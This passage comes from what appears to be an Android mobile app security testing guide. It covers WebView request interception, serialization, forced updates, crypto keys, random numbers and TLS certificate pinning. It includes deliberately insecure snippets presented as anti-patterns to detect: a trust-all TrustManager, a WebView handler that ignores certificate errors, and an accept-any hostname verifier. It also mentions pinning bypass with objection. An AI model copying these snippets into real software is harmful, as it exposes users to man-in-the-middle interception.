which allows navigation requests to be handled by the app itself.
To test if the app is overriding the default page navigation logic by configuring a WebViewClient
you should search for and inspect the following interception callback functions:
shouldOverrideUrlLoading
allows your application to either abort loading WebViews with suspicious content by returning true
or allow the WebView to load the URL by returning false
. Considerations:<script>
tags. Instead, shouldInterceptRequest
should take care of this.shouldInterceptRequest
allows the application to return the data from resource requests. If the return value is null, the WebView will continue to load the resource as usual. Otherwise, the data returned by the shouldInterceptRequest
method is used. Considerations:http(s):
, data:
, file:
, etc.), not only those schemes which send requests over the network.javascript:
or blob:
URLs, or for assets accessed via file:///android_asset/
or file:///android_res/
URLs. In the case of redirects, this is only called for the initial resource URL, not any subsequent redirect URLs.setSafeBrowsingWhitelist
or even ignore the warning via the onSafeBrowsingHit
callback.As you can see there are a lot of points to consider when testing the security of WebViews that have a WebViewClient configured, so be sure to carefully read and understand all of them by checking the WebViewClient
Documentation.
While the default value of EnableSafeBrowsing
is true
, some applications might opt to disable it. To verify that SafeBrowsing is enabled, inspect the AndroidManifest.xml file and make sure that the configuration below is not present:
<manifest>\n <application>\n <meta-data android:name=\"android.webkit.WebView.EnableSafeBrowsing\"\n android:value=\"false\" />\n ...\n </application>\n</manifest>\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0027/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test deep linking is to use Frida or frida-trace and hook the shouldOverrideUrlLoading
, shouldInterceptRequest
methods while using the app and clicking on links within the WebView. Be sure to also hook other related Uri
methods such as getHost
, getScheme
or getPath
which are typically used to inspect the requests and match known patterns or deny lists.
To test for object persistence being used for storing sensitive information on the device, first identify all instances of object serialization and check if they carry any sensitive data. If yes, check if is properly protected against eavesdropping or unauthorized modification.
There are a few generic remediation steps that you can always take:
For high-risk applications that focus on availability, we recommend that you use Serializable
only when the serialized classes are stable. Second, we recommend not using reflection-based persistence because
See the chapter \"Android Anti-Reversing Defenses\" for more details.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#object-serialization","title":"Object Serialization","text":"Search the source code for the following keywords:
import java.io.Serializable
implements Serializable
If you need to counter memory-dumping, make sure that very sensitive information is not stored in the JSON format because you can't guarantee prevention of anti-memory dumping techniques with the standard libraries. You can check for the following keywords in the corresponding libraries:
JSONObject
Search the source code for the following keywords:
import org.json.JSONObject;
import org.json.JSONArray;
GSON
Search the source code for the following keywords:
import com.google.gson
import com.google.gson.annotations
import com.google.gson.reflect
import com.google.gson.stream
new Gson();
@Expose
, @JsonAdapter
, @SerializedName
,@Since
, and @Until
Jackson
Search the source code for the following keywords:
import com.fasterxml.jackson.core
import org.codehaus.jackson
for the older version.When you use an ORM library, make sure that the data is stored in an encrypted database and the class representations are individually encrypted before storing it. See the chapters \"Data Storage on Android\" and \"Android Cryptographic APIs\" for more details. You can check for the following keywords in the corresponding libraries:
OrmLite
Search the source code for the following keywords:
import com.j256.*
import com.j256.dao
import com.j256.db
import com.j256.stmt
import com.j256.table\\
Please make sure that logging is disabled.
SugarORM
Search the source code for the following keywords:
import com.github.satyan
extends SugarRecord<Type>
meta-data
entries with values such as DATABASE
, VERSION
, QUERY_LOG
and DOMAIN_PACKAGE_NAME
.Make sure that QUERY_LOG
is set to false.
GreenDAO
Search the source code for the following keywords:
import org.greenrobot.greendao.annotation.Convert
import org.greenrobot.greendao.annotation.Entity
import org.greenrobot.greendao.annotation.Generated
import org.greenrobot.greendao.annotation.Id
import org.greenrobot.greendao.annotation.Index
import org.greenrobot.greendao.annotation.NotNull
import org.greenrobot.greendao.annotation.*
import org.greenrobot.greendao.database.Database
import org.greenrobot.greendao.query.Query
ActiveAndroid
Search the source code for the following keywords:
ActiveAndroid.initialize(<contextReference>);
import com.activeandroid.Configuration
import com.activeandroid.query.*
Realm
Search the source code for the following keywords:
import io.realm.RealmObject;
import io.realm.annotations.PrimaryKey;
Make sure that appropriate security measures are taken when sensitive information is stored in an Intent via a Bundle that contains a Parcelable. Use explicit Intents and verify proper additional security controls when using application-level IPC (e.g., signature verification, intent-permissions, crypto).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways to perform dynamic analysis:
To test for enforced updating you need to check if the app has support for in-app updates and validate if it's properly enforced so that the user is not able to continue using the app without updating it first.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#static-analysis","title":"Static analysis","text":"The code sample below shows the example of an app-update:
//Part 1: check for update\n// Creates instance of the manager.\nAppUpdateManager appUpdateManager = AppUpdateManagerFactory.create(context);\n\n// Returns an intent object that you use to check for an update.\nTask<AppUpdateInfo> appUpdateInfo = appUpdateManager.getAppUpdateInfo();\n\n// Checks that the platform will allow the specified type of update.\nif (appUpdateInfo.updateAvailability() == UpdateAvailability.UPDATE_AVAILABLE\n // For a flexible update, use AppUpdateType.FLEXIBLE\n && appUpdateInfo.isUpdateTypeAllowed(AppUpdateType.IMMEDIATE)) {\n\n\n\n //...Part 2: request update\n appUpdateManager.startUpdateFlowForResult(\n // Pass the intent that is returned by 'getAppUpdateInfo()'.\n appUpdateInfo,\n // Or 'AppUpdateType.FLEXIBLE' for flexible updates.\n AppUpdateType.IMMEDIATE,\n // The current activity making the update request.\n this,\n // Include a request code to later monitor this update request.\n MY_REQUEST_CODE);\n\n\n\n //...Part 3: check if update completed successfully\n @Override\n public void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (myRequestCode == MY_REQUEST_CODE) {\n if (resultCode != RESULT_OK) {\n log(\"Update flow failed! Result code: \" + resultCode);\n // If the update is cancelled or fails,\n // you can request to start the update again in case of forced updates\n }\n }\n }\n\n //..Part 4:\n // Checks that the update is not stalled during 'onResume()'.\n// However, you should execute this check at all entry points into the app.\n@Override\nprotected void onResume() {\n super.onResume();\n\n appUpdateManager\n .getAppUpdateInfo()\n .addOnSuccessListener(\n appUpdateInfo -> {\n ...\n if (appUpdateInfo.updateAvailability()\n == UpdateAvailability.DEVELOPER_TRIGGERED_UPDATE_IN_PROGRESS) {\n // If an in-app update is already running, resume the update.\n manager.startUpdateFlowForResult(\n appUpdateInfo,\n IMMEDIATE,\n this,\n MY_REQUEST_CODE);\n }\n });\n}\n}\n
Source: https://developer.android.com/guide/app-bundle/in-app-updates
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Lastly, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#static-analysis","title":"Static Analysis","text":"Detecting vulnerabilities in third party dependencies can be done by means of the OWASP Dependency checker. This is best done by using a gradle plugin, such as dependency-check-gradle
. In order to use the plugin, the following steps need to be applied: Install the plugin from the Maven central repository by adding the following script to your build.gradle:
buildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.owasp:dependency-check-gradle:3.2.0'\n }\n}\n\napply plugin: 'org.owasp.dependencycheck'\n
Once gradle has invoked the plugin, you can create a report by running:
gradle assemble\ngradle dependencyCheckAnalyze --info\n
The report will be in build/reports
unless otherwise configured. Use the report in order to analyze the vulnerabilities found. See remediation on what to do given the vulnerabilities found with the libraries.
Please be advised that the plugin requires to download a vulnerability feed. Consult the documentation in case issues arise with the plugin.
Lastly, please note that for hybrid applications, one will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, one will have to check the C# dependencies.
When a library is found to contain vulnerabilities, then the following reasoning applies:
When the sources are not available, one can decompile the app and check the JAR files. When Dexguard or ProGuard are applied properly, then version information about the library is often obfuscated and therefore gone. Otherwise you can still find the information very often in the comments of the Java files of given libraries. Tools such as MobSF can help in analyzing the possible libraries packed with the application. If you can retrieve the version of the library, either via comments, or via specific methods used in certain versions, you can look them up for CVEs by hand.
If the application is a high-risk application, you will end up vetting the library manually. In that case, there are specific requirements for native code, which you can find in the chapter \"Testing Code Quality\". Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises validating whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
There are various items to look for:
Note that there can be Memory leaks in Java/Kotlin code as well. Look for various items, such as: BroadcastReceivers which are not unregistered, static references to Activity
or View
classes, Singleton classes that have references to Context
, Inner Class references, Anonymous Class references, AsyncTask references, Handler references, Threading done wrong, TimerTask references. For more details, please check:
There are various steps to take:
Test the app native libraries to determine if they have the PIE and stack smashing protections enabled.
You can use radare2's rabin2 to get the binary information. We'll use the UnCrackable App for Android Level 4 v1.0 APK as an example.
All native libraries must have canary
and pic
both set to true
.
That's the case for libnative-lib.so
:
rabin2 -I lib/x86_64/libnative-lib.so | grep -E \"canary|pic\"\ncanary true\npic true\n
But not for libtool-checker.so
:
rabin2 -I lib/x86_64/libtool-checker.so | grep -E \"canary|pic\"\ncanary false\npic true\n
In this example, libtool-checker.so
must be recompiled with stack smashing protection support.
Identify all the instances of symmetric key encryption in code and look for any mechanism which loads or provides a symmetric key. You can look for:
DES
, AES
, etc.)KeyGenParameterSpec
, KeyPairGeneratorSpec
, KeyPairGenerator
, KeyGenerator
, KeyProperties
, etc.)java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
Check also the list of common cryptographic configuration issues.
For each identified instance verify if the used symmetric keys:
For each hardcoded symmetric key, verify that is not used in security-sensitive contexts as the only method of encryption.
As an example we illustrate how to locate the use of a hardcoded encryption key. First disassemble and decompile the app to obtain Java code, e.g. by using jadx.
Now search the files for the usage of the SecretKeySpec
class, e.g. by simply recursively grepping on them or using jadx search function:
grep -r \"SecretKeySpec\"\n
This will return all classes using the SecretKeySpec
class. Now examine those files and trace which variables are used to pass the key material. The figure below shows the result of performing this assessment on a production ready application. We can clearly locate the use of a static encryption key that is hardcoded and initialized in the static byte array Encrypt.keyBytes
.
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/","title":"Testing the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#static-analysis","title":"Static Analysis","text":"Identify all the instances of the cryptographic primitives in code. Identify all custom cryptography implementations. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
and android.security.keystore.*
packages.Identify that all calls to getInstance use default provider
of security services by not specifying it (it means AndroidOpenSSL aka Conscrypt). Provider
can only be specified in KeyStore
related code (in that situation KeyStore
should be provided as provider
). If other provider
is specified it should be verified according to situation and business case (i.e. Android API version), and provider
should be examined against potential vulnerabilities.
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/","title":"Testing the Purposes of Keys","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#static-analysis","title":"Static Analysis","text":"Identify all instances where cryptography is used. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
For each identified instance, identify its purpose and its type. It can be used:
Additionally, you should identify the business logic which uses identified instances of cryptography.
During verification the following checks should be performed:
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#static-analysis","title":"Static Analysis","text":"Identify all the instances of random number generators and look for either custom or well-known insecure classes. For instance, java.util.Random
produces an identical sequence of numbers for each given seed value; consequently, the sequence of numbers is predictable. Instead a well-vetted algorithm should be chosen that is currently considered to be strong by experts in the field, and a well-tested implementations with adequate length seeds should be used.
Identify all instances of SecureRandom
that are not created using the default constructor. Specifying the seed value may reduce randomness. Prefer the no-argument constructor of SecureRandom
that uses the system-specified seed value to generate a 128-byte-long random number.
In general, if a PRNG is not advertised as being cryptographically secure (e.g. java.util.Random
), then it is probably a statistical PRNG and should not be used in security-sensitive contexts. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 128-bit seed is a good starting point for producing a \"random enough\" number.
Once an attacker knows what type of weak pseudo-random number generator (PRNG) is used, it can be trivial to write a proof-of-concept to generate the next random value based on previously observed ones, as it was done for Java Random. In case of very weak custom random generators it may be possible to observe the pattern statistically. Although the recommended approach would anyway be to decompile the APK and inspect the algorithm (see Static Analysis).
If you want to test for randomness, you can try to capture a large set of numbers and check with the Burp's sequencer to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on the mentioned classes and methods to determine input / output values being used.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using HttpsURLConnection
or SSLSocket
(for socket-level communication using TLS).
Next, even when using a low-level API which is supposed to make secure connections (such as SSLSocket
), be aware that it has to be securely implemented. For instance, SSLSocket
doesn't verify the hostname. Use getDefaultHostnameVerifier
to verify the hostname. The Android developer documentation includes a code example.
Next, you should ensure that the app is not allowing cleartext HTTP traffic. Since Android 9 (API level 28) cleartext HTTP traffic is blocked by default (thanks to the default Network Security Configuration) but there are multiple ways in which an application can still send it:
android:usesCleartextTraffic
attribute of the <application>
tag in the AndroidManifest.xml file. Note that this flag is ignored in case the Network Security Configuration is configured.cleartextTrafficPermitted
attribute to true on <domain-config>
elements.Socket
) to set up a custom HTTP connection.All of the above cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Android Manifest or Network Security Configuration, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which Network Security Configuration is ignored) or a badly configured cross-platform framework.
For more information refer to the article \"Security with HTTPS and SSL\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Refer to section \"Verifying the TLS Settings\" in chapter \"Mobile App Network Communication\" for details.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/","title":"Testing Endpoint Identify Verification","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
Two key issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Android documentation. Search the code for examples of TrustManager
and HostnameVerifier
usage. In the sections below, you can find examples of the kind of insecure usage that you should look for.
Note that from Android 8.0 (API level 26) onward, there is no support for SSLv3 and HttpsURLConnection
will no longer perform a fallback to an insecure TLS/SSL protocol.
Applications targeting Android 7.0 (API level 24) or higher will use a default Network Security Configuration that doesn't trust any user supplied CAs, reducing the possibility of MITM attacks by luring users to install malicious CAs.
Decode the app using apktool and verify that the targetSdkVersion
in apktool.yml is equal to or higher than 24
.
grep targetSdkVersion UnCrackable-Level3/apktool.yml\n targetSdkVersion: '28'\n
However, even if targetSdkVersion >=24
, the developer can disable default protections by using a custom Network Security Configuration defining a custom trust anchor forcing the app to trust user supplied CAs. See \"Analyzing Custom Trust Anchors\".
Search for the Network Security Configuration file and inspect any custom <trust-anchors>
defining <certificates src=\"user\">
(which should be avoided).
You should carefully analyze the precedence of entries:
<domain-config>
entry or in a parent <domain-config>
, the configurations in place will be based on the <base-config>
Take a look at this example of a Network Security Configuration for an app targeting Android 9 (API level 28):
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n <domain includeSubdomains=\"false\">owasp.org</domain>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </domain-config>\n</network-security-config>\n
Some observations:
<base-config>
, meaning that the default configuration for Android 9 (API level 28) or higher will be used for all other connections (only system
CA will be trusted in principle).<domain-config>
overrides the default configuration allowing the app to trust both system
and user
CAs for the indicated <domain>
(owasp.org).includeSubdomains=\"false\"
.Putting all together we can translate the above Network Security Configuration to: \"the app trusts system and user CAs for the owasp.org domain, excluding its subdomains. For any other domains the app will trust the system CAs only\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#verifying-the-server-certificate","title":"Verifying the Server Certificate","text":"TrustManager
is a means of verifying conditions necessary for establishing a trusted connection in Android. The following conditions should be checked at this point:
The following code snippet is sometimes used during development and will accept any certificate, overwriting the functions checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
. Such implementations should be avoided, and, if they are necessary, they should be clearly separated from production builds to avoid built-in security flaws.
TrustManager[] trustAllCerts = new TrustManager[] {\n new X509TrustManager() {\n @Override\n public X509Certificate[] getAcceptedIssuers() {\n return new java.security.cert.X509Certificate[] {};\n }\n\n @Override\n public void checkClientTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n\n @Override\n public void checkServerTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n }\n };\n\n// SSLContext context\ncontext.init(null, trustAllCerts, new SecureRandom());\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#webview-server-certificate-verification","title":"WebView Server Certificate Verification","text":"Sometimes applications use a WebView to render the website associated with the application. This is true of HTML/JavaScript-based frameworks such as Apache Cordova, which uses an internal WebView for application interaction. When a WebView is used, the mobile browser performs the server certificate validation. Ignoring any TLS error that occurs when the WebView tries to connect to the remote website is a bad practice.
The following code will ignore TLS issues, exactly like the WebViewClient custom implementation provided to the WebView:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n @Override\n public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {\n //Ignore TLS certificate errors and instruct the WebViewClient to load the website\n handler.proceed();\n }\n});\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#apache-cordova-certificate-verification","title":"Apache Cordova Certificate Verification","text":"Implementation of the Apache Cordova framework's internal WebView usage will ignore TLS errors in the method onReceivedSslError
if the flag android:debuggable
is enabled in the application manifest. Therefore, make sure that the app is not debuggable. See the test case \"Testing If the App is Debuggable\".
Another security flaw in client-side TLS implementations is the lack of hostname verification. Development environments usually use internal addresses instead of valid domain names, so developers often disable hostname verification (or force an application to allow any hostname) and simply forget to change it when their application goes to production. The following code disables hostname verification:
final static HostnameVerifier NO_VERIFY = new HostnameVerifier() {\n public boolean verify(String hostname, SSLSession session) {\n return true;\n }\n};\n
With a built-in HostnameVerifier
, accepting any hostname is possible:
HostnameVerifier NO_VERIFY = org.apache.http.conn.ssl.SSLSocketFactory\n .ALLOW_ALL_HOSTNAME_VERIFIER;\n
Make sure that your application verifies a hostname before setting a trusted connection.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#dynamic-analysis","title":"Dynamic Analysis","text":"When testing an app targeting Android 7.0 (API level 24) or higher it should be effectively applying the Network Security Configuration and you shouldn't able to see the decrypted HTTPS traffic at first. However, if the app targets API levels below 24, the app will automatically accept the installed user certificates.
To test improper certificate verification launch a MITM attack using an interception proxy such as Burp. Try the following options:
If you're still not able to see any decrypted HTTPS traffic, your application might be implementing certificate pinning.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-security-configuration","title":"Network Security Configuration","text":"Inspect the Network Security Configuration looking for any <pin-set>
elements. Check their expiration
date, if any. If expired, certificate pinning will be disabled for the affected domains.
Testing Tip: If a certificate pinning validation check has failed, the following event should be logged in the system logs:
I/X509Util: Failed to validate the certificate chain, error: Pin verification failed\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#trustmanager","title":"TrustManager","text":"Implementing certificate pinning involves three main steps:
To analyze the correct implementation of certificate pinning, the HTTP client should load the KeyStore:
InputStream in = resources.openRawResource(certificateRawResource);\nkeyStore = KeyStore.getInstance(\"BKS\");\nkeyStore.load(resourceStream, password);\n
Once the KeyStore has been loaded, we can use the TrustManager that trusts the CAs in our KeyStore:
String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();\nTrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);\ntmf.init(keyStore);\n// Create an SSLContext that uses the TrustManager\n// SSLContext context = SSLContext.getInstance(\"TLS\");\nsslContext.init(null, tmf.getTrustManagers(), null);\n
The app's implementation may be different, pinning against the certificate's public key only, the whole certificate, or a whole certificate chain.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-libraries-and-webviews","title":"Network Libraries and WebViews","text":"Applications that use third-party networking libraries may utilize the libraries' certificate pinning functionality. For example, okhttp can be set up with the CertificatePinner
as follows:
OkHttpClient client = new OkHttpClient.Builder()\n .certificatePinner(new CertificatePinner.Builder()\n .add(\"example.com\", \"sha256/UwQAapahrjCOjYI3oLUx5AQxPBR02Jz6/E2pt0IeLXA=\")\n .build())\n .build();\n
Applications that use a WebView component may utilize the WebViewClient's event handler for some kind of \"certificate pinning\" of each request before the target resource is loaded. The following code shows an example verification:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n private String expectedIssuerDN = \"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US;\";\n\n @Override\n public void onLoadResource(WebView view, String url) {\n //From Android API documentation about \"WebView.getCertificate()\":\n //Gets the SSL certificate for the main top-level page\n //or null if there is no certificate (the site is not secure).\n //\n //Available information on SslCertificate class are \"Issuer DN\", \"Subject DN\" and validity date helpers\n SslCertificate serverCert = view.getCertificate();\n if(serverCert != null){\n //apply either certificate or public key pinning comparison here\n //Throw exception to cancel resource loading...\n }\n }\n }\n});\n
Alternatively, it is better to use an OkHttpClient with configured pins and let it act as a proxy overriding shouldInterceptRequest
of the WebViewClient
.
Applications developed in Xamarin will typically use ServicePointManager
to implement pinning.
Normally a function is created to check the certificate(s) and return the boolean value to the method ServerCertificateValidationCallback
:
[Activity(Label = \"XamarinPinning\", MainLauncher = true)]\n public class MainActivity : Activity\n {\n // SupportedPublicKey - Hexadecimal value of the public key.\n // Use GetPublicKeyString() method to determine the public key of the certificate we want to pin. Uncomment the debug code in the ValidateServerCertificate function a first time to determine the value to pin.\n private const string SupportedPublicKey = \"3082010A02820101009CD30CF05AE52E47B7725D3783B...\"; // Shortened for readability\n\n private static bool ValidateServerCertificate(\n object sender,\n X509Certificate certificate,\n X509Chain chain,\n SslPolicyErrors sslPolicyErrors\n )\n {\n //Log.Debug(\"Xamarin Pinning\",chain.ChainElements[X].Certificate.GetPublicKeyString());\n //return true;\n return SupportedPublicKey == chain.ChainElements[1].Certificate.GetPublicKeyString();\n }\n\n protected override void OnCreate(Bundle savedInstanceState)\n {\n System.Net.ServicePointManager.ServerCertificateValidationCallback += ValidateServerCertificate;\n base.OnCreate(savedInstanceState);\n SetContentView(Resource.Layout.Main);\n TesteAsync(\"https://security.claudio.pt\");\n\n }\n
In this particular example we are pinning the intermediate CA of the certificate chain. The output of the HTTP response will be available in the system logs.
Sample Xamarin app with the previous example can be obtained on the MASTG repository
After decompressing the APK file, use a .NET decompiler like dotPeak, ILSpy or dnSpy to decompile the app dlls stored inside the 'Assemblies' folder and confirm the usage of the ServicePointManager.
Learn more:
Hybrid applications based on Cordova do not support Certificate Pinning natively, so plugins are used to achieve this. The most common one is PhoneGap SSL Certificate Checker. The check
method is used to confirm the fingerprint and callbacks will determine the next steps.
// Endpoint to verify against certificate pinning.\n var server = \"https://www.owasp.org\";\n // SHA256 Fingerprint (Can be obtained via \"openssl s_client -connect hostname:443 | openssl x509 -noout -fingerprint -sha256\"\n var fingerprint = \"D8 EF 3C DF 7E F6 44 BA 04 EC D5 97 14 BB 00 4A 7A F5 26 63 53 87 4E 76 67 77 F0 F4 CC ED 67 B9\";\n\n window.plugins.sslCertificateChecker.check(\n successCallback,\n errorCallback,\n server,\n fingerprint);\n\n function successCallback(message) {\n alert(message);\n // Message is always: CONNECTION_SECURE.\n // Now do something with the trusted server.\n }\n\n function errorCallback(message) {\n alert(message);\n if (message === \"CONNECTION_NOT_SECURE\") {\n // There is likely a man in the middle attack going on, be careful!\n } else if (message.indexOf(\"CONNECTION_FAILED\") > -1) {\n // There was no connection (yet). Internet may be down. Try again (a few times) after a little timeout.\n }\n }\n
After decompressing the APK file, Cordova/Phonegap files will be located in the /assets/www folder. The 'plugins' folder will give you the visibility of the plugins used. We will need to search for these methods in the JavaScript code of the application to confirm their usage.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#dynamic-analysis","title":"Dynamic Analysis","text":"Follow the instructions from \"Testing Endpoint Identity Verification > Dynamic Analysis\". If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/","title":"Testing the Security Provider","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#static-analysis","title":"Static Analysis","text":"Applications based on the Android SDK should depend on GooglePlayServices. For example, in the gradle build file, you will find compile 'com.google.android.gms:play-services-gcm:x.x.x'
in the dependencies block. You need to make sure that the ProviderInstaller
class is called with either installIfNeeded
or installIfNeededAsync
. ProviderInstaller
needs to be called by a component of the application as early as possible. Exceptions thrown by these methods should be caught and handled correctly. If the application cannot patch its security provider, it can either inform the API of its less secure state or restrict user actions (because all HTTPS traffic should be deemed riskier in this situation).
If you have access to the source code, check if the app handles any exceptions related to the security provider updates properly, and if it reports to the backend when the application is working with an unpatched security provider. The Android Developer documentation provides different examples showing how to update the Security Provider to prevent SSL exploits.
Lastly, make sure that NDK-based applications bind only to a recent and properly patched library that provides SSL/TLS functionality.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#dynamic-analysis","title":"Dynamic Analysis","text":"When you have the source code:
